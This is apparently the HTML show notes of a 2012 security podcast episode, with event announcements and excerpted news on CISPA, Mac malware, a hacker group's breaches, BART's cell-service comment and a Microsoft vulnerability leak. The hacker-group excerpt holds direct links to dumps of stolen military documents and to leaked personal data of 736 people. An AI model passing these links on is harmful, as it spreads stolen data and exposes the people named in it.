			<content:encoded><![CDATA[<p><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">InfoSec Daily Podcast Episode 659 for May 3, 2012. &nbsp;</span><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</span></b></p>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Announcements</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">GraniteSec (formerly The New England InfoSec Tweetup)<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;May 19, 2012<br />
	Where: &nbsp;Veasey Memorial Park, Groveland, MA<br />
	</span><a href="http://granitesec.org/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://granitesec.org</span></a></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">AIDE 2012<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 21-25, 2012<br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br />
	</span><a href="http://www.appyide.org/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.appyide.org/</span></a></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">LayerOne 2012<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 26-27, 2012<br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br />
	</span><a href="http://www.layerone.org/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.layerone.org</span></a></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: June 20 &#8211; 27, 2012<br />
	Where: Courtyard Seattle Federal Way, WA <br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.sans.org/mentor/details.php?nid=28014</span></a></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Social Engineering Training</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21-24, 2012<br />
	Where: Black Hat Vegas</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: August 20-24, 2012<br />
	Where: &nbsp;Bristol, UK</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;November 12-16, 2012<br />
	Where: &nbsp;Columbia, MD<br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.social-engineer.com/social-engineer-training</span></a></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Inside and Out of the Social-Engineer Toolkit (SET)<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21 &#8211; 22, 2012<br />
	When: July 23 &#8211; 24, 2012<br />
	Where: Black Hat Vegas<br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;September 27-30, 2012<br />
	Where: Louisville, KY<br />
	</span><a href="http://www.derbycon.com/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.derbycon.com</span></a></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Skydogcon<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: October 26-28<br />
	Where: Hotel Preston in Nashville, TN <br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.skydogcon.com</span></a></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Please consider making your Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Or simply use our QR Code Links.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon:</span><img height="135px;" src="https://lh5.googleusercontent.com/D43mqTN7JIkF1Bmb-BlDiFMWhgWclZk9yiQNUexreXJSvNoZfbP-_WEjx1aA4iL721dRvh3Nd7OdG2RwWPkwRdpeVmKMUkRbhI7yybKfahEftAPOdBk" width="135px;" /></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon UK:</span><img height="138px;" src="https://lh5.googleusercontent.com/RrBfQBmDY3fUQvMEKM9sOogjyvH5-WP4j-VwpN1JZBOsiqyAUjH3o1ziyJW7ctULAIwykkNIIJDaj_V6-wJLf_b1Jip72kD4W_6oOUW8v94oTw_J_5U" width="138px;" /></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Stories</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://www.forbes.com/sites/andygreenberg/2012/05/01/mozilla-slams-cispa-breaking-silicon-valleys-silence-on-cybersecurity-bill/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.forbes.com/sites/andygreenberg/2012/05/01/mozilla-slams-cispa-breaking-silicon-valleys-silence-on-cybersecurity-bill/</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Not to be lumped in with Microsoft, Apple, Facebook, Oracle and other CISPA supporters in the tech world, Mozilla announced Wednesday that it stands opposed to the cybersecurity bill.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">In a </span><a href="http://www.forbes.com/sites/andygreenberg/2012/05/01/mozilla-slams-cispa-breaking-silicon-valleys-silence-on-cybersecurity-bill/?view=pc"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">statement</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> sent to Forbes, the company&rsquo;s Privacy and Public Policy had the following to say about CISPA:</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">While we wholeheartedly support a more secure Internet, CISPA has a broad and alarming reach that goes far beyond Internet security. The bill infringes on our privacy, includes vague definitions of cybersecurity, and grants immunities to companies and government that are too broad around information misuse. We hope the Senate takes the time to fully and openly consider these issues with stakeholder input before moving forward with this legislation.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Source: </span><a href="https://www.computerworld.com/s/article/9226777/Microsoft_detects_new_malware_targeting_Apple_computers"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">https://www.computerworld.com/s/article/9226777/Microsoft_detects_new_malware_targeting_Apple_computers</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Microsoft has detected a new piece of malware targeting Apple OS X computers that exploits a vulnerability in the Office productivity suite patched nearly three years ago.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The malware is not widespread, wrote Jeong Wook Oh of Microsoft&#39;s Malware Protection Center. But it does show that hackers pay attention if it&#39;s found people do not apply patches as those fixes are released, putting their computers at a higher risk of becoming infected.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;Exploiting Mac OS X is not much different from other operating systems,&quot; Oh wrote. &quot;Even though Mac OS X has introduced many mitigation technologies to reduce risk, your protection against security vulnerabilities has a direct correlation with updating installed applications.&quot;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Source: </span>&nbsp;<a href="http://www.zdnet.com/blog/security/mystery-group-hacks-us-military-harvard-nasa-more/11789"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.zdnet.com/blog/security/mystery-group-hacks-us-military-harvard-nasa-more/11789</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">A hacker group calling itself &ldquo;The Unknowns&rdquo; claims to have hacked 10 organizations around the world, gaining administrator access for all and leaking data for some. Most are related to the U.S. government or another international legislative body, while the rest just seemed like random targets.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The Unknowns yesterday set up the Twitter account &ldquo;1_The_Unknown_1&rdquo; and released their results on Pastebin. Apparently, the group&rsquo;s slogan is &ldquo;We are The Unknowns; Our Knowledge Talks and Wisdom Listens&hellip;&rdquo;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The Unknowns listed 10 victim websites for which it publicly posted administrator accounts and passwords:</span></b></div>
<ul style="margin-top: 0pt; margin-bottom: 0pt; ">
<li style="list-style-type: circle; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="vertical-align: baseline; white-space: pre-wrap; ">NASA &#8211; Glenn Research Center</span></b></div>
</li>
<li style="list-style-type: circle; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="vertical-align: baseline; white-space: pre-wrap; ">U.S. military</span></b></div>
</li>
<li style="list-style-type: circle; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="vertical-align: baseline; white-space: pre-wrap; ">U.S. Air Force</span></b></div>
</li>
<li style="list-style-type: circle; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="vertical-align: baseline; white-space: pre-wrap; ">European Space Agency</span></b></div>
</li>
<li style="list-style-type: circle; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="vertical-align: baseline; white-space: pre-wrap; ">Thai Royal Navy</span></b></div>
</li>
<li style="list-style-type: circle; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="vertical-align: baseline; white-space: pre-wrap; ">Harvard University</span></b></div>
</li>
<li style="list-style-type: circle; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="vertical-align: baseline; white-space: pre-wrap; ">Renault</span></b></div>
</li>
<li style="list-style-type: circle; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="vertical-align: baseline; white-space: pre-wrap; ">French ministry of Defense</span></b></div>
</li>
<li style="list-style-type: circle; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="vertical-align: baseline; white-space: pre-wrap; ">Bahrain Ministry of Defense</span></b></div>
</li>
<li style="list-style-type: circle; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="vertical-align: baseline; white-space: pre-wrap; ">Jordanian Yellow Pages</span></b></div>
</li>
</ul>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">In addition to revealing how to access the computer systems of the organizations in question, The Unknowns also posted screenshots showing they gained accessed to each and every one. More importantly, the group put together military documents from their hacks, and uploaded the collection to MediaFire: </span><a href="http://www.mediafire.com/?g2fgx29rqc5adjj"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Part 1</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> (177.79MB) and </span><a href="http://www.mediafire.com/?bi6a2rubgc89za2"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Part 2</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> (37.37 MB).</span></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">So, what was the motivation? The group wrote the following message, explaining that the goal of their attacks is to improve the state of online security around the globe:</span></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Victims, we have released some of your documents and data, we probably harmed you a bit but that&rsquo;s not really our goal because if it was then all of your websites would be completely defaced but we know that within a week or two, the vulnerabilties we found will be patched and that&rsquo;s what we&rsquo;re actually looking for.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">We&rsquo;re ready to give you full info on how we penetrated threw your databases and we&rsquo;re ready to do this any time so just contact us, we will be looking forward for this.</span></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">And for all the other websites out there: We&rsquo;re coming, please, get ready, protect your website and stop us from hacking it, whoever you are. Contact us before we take action and we will help you, and will not release anything&hellip; It&rsquo;s your choice now.</span></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">And for the Public: We&rsquo;re looking for your support&hellip; Support us to deliver our message to everyone out there&hellip;</span></b></div>
<p><b id="internal-source-marker_0.5158419227227569"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">As for the screenshot above, I chose the NASA hack because the group also decided to leak one of the research center&rsquo;s databases. They released names, employers, home addresses, and e-mail addresses of 736 victims on </span><a href="http://webcache.googleusercontent.com/search?q=cache:0MeH6DA1dPIJ:pastebin.com/KQLZrW97+&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Pastebin</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">. ESA is the other organization for which they also leaked more data, also via </span><a href="http://webcache.googleusercontent.com/search?q=cache:WiZ0wW_8LyoJ:pastebin.com/7sC8U1S2+&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Pastebin</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The Unknowns may be trying to use an old hack to gain Twitter followers. Some of the leaked documents are indeed several years old, but there are also a few from earlier in 2012. I will update you again if I learn more.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Source: </span><a href="http://apps.fcc.gov/ecfs/document/view?id=7021914739"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://apps.fcc.gov/ecfs/document/view?id=7021914739</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The San Francisco Bay Area Rapid Transit District hereby submits this brief comment in response to the Public Notice issued in the above-referenced proceeding. Specifically BART addresses certain of the questions asked in Section 5, Authority to Interrupt Service. BART recognizes and respects the public&#39;s need for access to cellular phones and other wireless devices, both for safety and convenience and that such services should be kept available, except in extreme circumstances. BART is concerned, however, that, as the agency responsible for the public safety of more than 350,000 passengers each weekday, that it must have the tools at its disposal to protect that public from wrongful use of wireless devices, as they can be used as an instrument for doing harm to passengers and BART employees. A temporary interruption of cell phone service, under extreme circumstances where harm and destruction are imminent, is a necessary tool to protect passengers and respond to potential acts of terrorism or other acts of violence. For example, wireless devices may be used to detonate explosives, Such an explosion in a system like BART, with much of its approximately 100 miles of track located under either metropolitan downtown areas or the San Francisco Bay itself, would be devastating, not just for the passengers, but for the public at large located around the devastation or affected by flooding that could be caused by damage to the trans bay tube,</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Source: </span><a href="http://www.eweek.com/c/a/Security/Microsoft-Drops-Chinese-Firm-From-VulnerabilitySharing-Group-244344/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.eweek.com/c/a/Security/Microsoft-Drops-Chinese-Firm-From-VulnerabilitySharing-Group-244344/</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Microsoft has identified a Chinese network security vendor as the company that leaked proof-of-concept code for a security hole in all version of its Windows operating system, and has kicked the company out of a program designed to share vulnerability information with security software vendors.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">In a</span><a href="http://blogs.technet.com/b/msrc/archive/2012/05/03/mapp-update-taking-action-to-decrease-risk-of-information-disclosure.aspx"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> May 3 post</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> on the Microsoft Security Response Center blog, Yunsen Wee, director of Microsoft Trustworthy Computing, said an investigation in the leak, which occurred in March, determined that Hangzhou DPTech Technologies was the company that</span><a href="http://www.eweek.com/c/a/Security/Microsoft-Critical-Vulnerability-Info-May-Have-Leaked-166375/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> leaked the proof-of-concept code</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">, which found its way onto a Chinese-language online forum.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The publishing of the proof-of-concept code essentially gave potential hackers access to the information needed to exploit the Windows vulnerability before Microsoft could release a patch for it. At the time, Wee said cyber-criminals could use the code to launch remote code execution attacks that leverage the flaw, which Microsoft had tagged as &ldquo;critical.&rdquo;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">In her blog post, Wee said Microsoft had shared the confidential information with members of the company&rsquo;s Microsoft Active Protections Program (MAPP), which was created in 2008 to enable the software giant to share vulnerability data with security companies to enable them to prepare their products for when the security updates are released.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Microsoft shares this data under a strict non-disclosure agreement (NDA) with all MAPP members, Wee said. Hangzhous DPTech violated this agreement and was removed from the program, she said.</span></b></div>
